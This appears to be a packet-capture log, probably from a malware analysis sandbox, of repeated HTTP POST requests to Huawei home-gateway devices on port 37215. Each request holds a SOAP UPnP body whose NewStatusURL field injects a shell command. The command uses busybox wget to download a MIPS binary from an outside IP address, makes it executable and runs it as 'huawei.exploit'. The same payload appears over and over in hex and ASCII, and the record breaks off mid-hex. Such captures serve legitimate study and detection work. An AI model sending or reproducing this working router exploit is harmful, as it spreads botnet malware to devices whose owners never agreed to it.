                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:32.803702116 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          445192.168.2.2356952156.254.85.3237215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.334382057 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:04.903599024 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:06.759351969 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:10.534816027 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:17.957768917 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
                                                          Jan 2, 2024 06:25:32.803713083 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 24 28 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 77 67 65 74 20 2d 67 20 31 35 37 2e 39 30 2e 32 35 30 2e 39 30 20 2d 6c 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 2d 72 20 2f 68 30 72 30 7a 78 30 30 78 68 30 72 30 7a 78 30 30 78 64 65 66 61 75 6c 74 2f 68 30 72 30 7a 78 30 30 78 2e 6d 69 70 73 3b 20 2f 62 69 6e 2f 62 75 73 79 62 6f 78 20 63 68 6d 6f 64 20 37 37 37 20 2a 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 3b 20 2f 74 6d 70 2f 2e 75 6e 73 74 61 62 6c 65 20 68 75 61 77 65 69 2e 65 78 70 6c 6f 69 74 29 3c 2f 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 3c 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 24 28 65 63 68 6f 20 48 55 41 57 45 49 55 50 4e 50 29 3c 2f 4e 65 77 44 6f 77 6e 6c 6f 61 64 55 52 4c 3e 3c 2f 75 3a 55 70 67 72 61 64 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a
                                                          Data Ascii: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g 157.90.250.90 -l /tmp/.unstable -r /h0r0zx00xh0r0zx00xdefault/h0r0zx00x.mips; /bin/busybox chmod 777 * /tmp/.unstable; /tmp/.unstable huawei.exploit)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          446192.168.2.2349608156.235.102.7237215
                                                          TimestampBytes transferredDirectionData
                                                          Jan 2, 2024 06:25:03.497047901 CET870OUTPOST /ctrlt/DeviceUpgrade_1 HTTP/1.1
                                                          Content-Length: 430
                                                          Connection: keep-alive
                                                          Accept: */*
                                                          Authorization: Digest username="dslf-config", realm="HuaweiHomeGateway", nonce="88645cefb1f9ede0e336e3569d75ee30", uri="/ctrlt/DeviceUpgrade_1", response="3612f843a42db38f48f59d2a3597e19c", algorithm="MD5", qop="auth", nc=00000001, cnonce="248d1a2560100669"
                                                          Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 3f 3e 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 20 73 3a 65 6e 63 6f 64 69 6e 67 53 74 79 6c 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 63 6f 64 69 6e 67 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 75 3a 55 70 67 72 61 64 65 20 78 6d 6c 6e 73 3a 75 3d 22 75 72 6e 3a 73 63 68 65 6d 61 73 2d 75 70 6e 70 2d 6f 72 67 3a 73 65 72 76 69 63 65 3a 57 41 4e 50 50 50 43 6f 6e 6e 65 63 74 69 6f 6e 3a 31 22 3e 3c 4e 65 77 53 74 61 74 75 73 55 52 4c 3e 